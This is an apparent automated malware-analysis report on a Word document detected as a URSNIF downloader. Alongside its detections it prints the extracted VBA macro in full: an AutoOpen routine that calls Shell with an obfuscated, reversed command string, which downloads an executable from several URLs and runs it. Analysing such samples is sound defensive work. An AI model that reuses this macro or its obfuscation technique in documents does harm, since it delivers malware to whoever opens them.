MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen subroutine that utilizes the Shell() function to execute a command. The script attempts to construct a command line for setting environment variables and potentially downloading a payload. The ClamAV detection and heuristic firings strongly indicate a downloader family, likely URSNIF, which is known for its macro-based execution.
Heuristics 6
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5855 bytes |
SHA-256: 63856ccbd7ce964202f763da589f5c4e71610963cfb34115c084f560d936e244 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ENSFQkBPXDGVC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Hour "419833367" + "8029" + "rHQfY" + "MD"
VBA.Shell CleanString(v) + dZwUjccHtvXhrB + wYLawqWoz + zAGFHwq + DrqXFjJw + XjoalWNMSP + imzWrRlfMqN + wCjGHiws + QkiNQzMtzjYbk, 29 - 29
Hour "KShLnXcwl" + "900" + "UGT" + "263898586"
Hour "hF" + "Cw" + "5771" + "a"
Hour "399453159" + "j" + "465645180" + "133906325"
Hour "nCHVZPjEKoQwvI" + "dio" + "502785223" + "NjsJvBdo"
End Sub
Attribute VB_Name = "TTutMTvb"
Function zAGFHwq()
On _
Error _
Resume _
Next
Hour "491951978" + "522197538"
Hour "hz" + "tXq" + "197017589" + "1796"
LjnrUXiw = "cmd /V" + "/C" + Chr(1 + 4 + 5 + 3 + 21) + "s^e" + "^t" + " " + "^" + "s" + "l" + "=" + " ^ ^ " + "^ ^ " + "^ ^"
Hour "LaVhLMwhMjWSM" + "6853" + "59077737" + "38652072"
Hour "mtcfTi" + "28964707"
Hour "4995" + "3141" + "FzTPbLHoW" + "V"
CqYwUi = " ^ ^ ^" + " ^ " + " }" + "^}{^hc" + "t" + "^ac^}"
Hour "Aq" + "2281"
Hour "Mr" + "44551844" + "DD" + "322888913"
qSDOodhLqaN = ";^ka^er" + "^b^;^T" + "N" + "G$ me^" + "tI-^e^" + "k^ovnI" + ";)TNG$^" + " ,Sr^j" + "^$(^e" + "l^i^F" + "^d^a^" + "oln^w^o"
Hour "9181" + "bzUCDiskwwpHGr" + "C" + "fjdDAFAo"
Hour "3980" + "FBqkVk" + "3652" + "SGzIWjPs"
Hour "zPlTiVJGS" + "USRiEacbLq"
oBEhkDbQwsj = "^D" + "^.s^kR" + "$" + "{^yr" + "t{)" + "i" + "bC^$^" + " n^i^"
Hour "UNjfvfIR" + "140234673" + "wG" + "N"
Hour "EohbKAnmzbSbOh" + "WcKXNZZ" + "6390" + "2431"
Hour "343827448" + "JIt" + "3101" + "414688990"
KdIMIXksj = " " + "Srj" + "$(hca" + "er^o^" + "f^;^'" + "e" + "xe^.'+j" + "^aw^$" + "+^'\" + "'^+" + "cil^" + "b" + "^up:vn^"
zAGFHwq = LjnrUXiw + CqYwUi + qSDOodhLqaN + oBEhkDbQwsj + KdIMIXksj
Hour "FPW" + "5010"
Hour "444239114" + "XiwpWioARB"
End Function
Function DrqXFjJw()
On _
Error _
Resume _
Next
Hour "qYBTQwvzrUY" + "222" + "dKw" + "ifIQ"
Hour "iNiv" + "BiEO" + "QJMW" + "438302372"
Hour "4137" + "khduFuAKoSSRSs"
Hour "KIpjNI" + "453231151"
Hour "38993256" + "q" + "wCfioTIK" + "ti"
Hour "EtXO" + "448045028" + "z" + "7816"
QAHZXaUKfpN = "e^$^=" + "^TNG$^" + ";^'^2" + "1" + "^6^" + "'^ ^=^ " + "^" + "ja^" + "w^$" + "^;)'" + "@'(^" + "ti^l"
Hour "PujrJiE" + "4353"
SBJdMv = "p" + "^S^.^" + "'^y^I^" + "Yn" + "oC^"
Hour "8751" + "6817"
Hour "rp" + "ONSKcqULhRFsJm" + "7181" + "fHfDkjBXIFDHo"
Hour "wKWM" + "nERNpKEY"
Hour "208" + "3011" + "8370" + "viCtOaici"
Hour "226785625" + "Hnz"
tMEKOjmzW = "m" + "/m^" + "oc" + "^.hk" + "^ira^" + "p^dh" + "tr" + "^ama"
Hour "kYcKWFSuiGELiX" + "OzuE" + "Hli" + "KjJ"
Hour "wKSt" + "320744670"
Hour "431539811" + "LG"
Hour "414864760" + "259258549"
HEiAKX = "^" + "s//^:p" + "^t^th^" + "@V" + "^t^" + "yC" + "^" + "BEtpZ" + "/" + "m^oc." + "a" + "d^x^" + "eht/"
Hour "PJWsHcsVns" + "dv"
Hour "mnP" + "9456" + "iMvvj" + "UXAt"
Hour "SwjLqwuzznvhc" + "AsHS" + "jzXLslM" + "jI"
dpVtRH = "/^:^p^t" + "t^" + "h@^Z" + "^p" + "st^S^W" + "^9^f0/" + "^" + "tp"
DrqXFjJw = QAHZXaUKfpN + SBJdMv + tMEKOjmzW + HEiAKX + dpVtRH
Hour "1720" + "NzcPh" + "sw" + "913"
Hour "FasQPww" + "itQbXtrijXBH"
Hour "2889" + "qLE"
Hour "243585824" + "rZi"
End Function
Function XjoalWNMSP()
On _
Error _
Resume _
Next
Hour "UkSrtiZRqkqMnF" + "AlK" + "N" + "V"
Hour "k" + "j" + "1685" + "nDZ"
rElzLwadCXz = "^.si" + "lni" + "^a" + "^m/" + "/" + "^:" + "^" + "pt^t^h" + "@^J^"
Hour "8306" + "Xfw" + "233869674" + "EM"
Hour "arhjEdUX" + "wP"
XiRwbwZ = "7" + "^T" + "aS^" + "XV^m" + "^y^" + "1" + "/m^" + "oc" + "." + "rop" + "scn"
Hour "329832022" + "7326" + "UQGrwPdnL" + "jKhjDjF"
Hour "7719" + "373581489" + "200" + "215615163"
blqVhuQuAU = "^ani^." + "w" + "w" + "^w//:^" + "p^tth^" + "@^sZ^w" + "U" + "^4" + "4^d^Sk" + "^I" + "/cc^.^t" + "nec^s"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.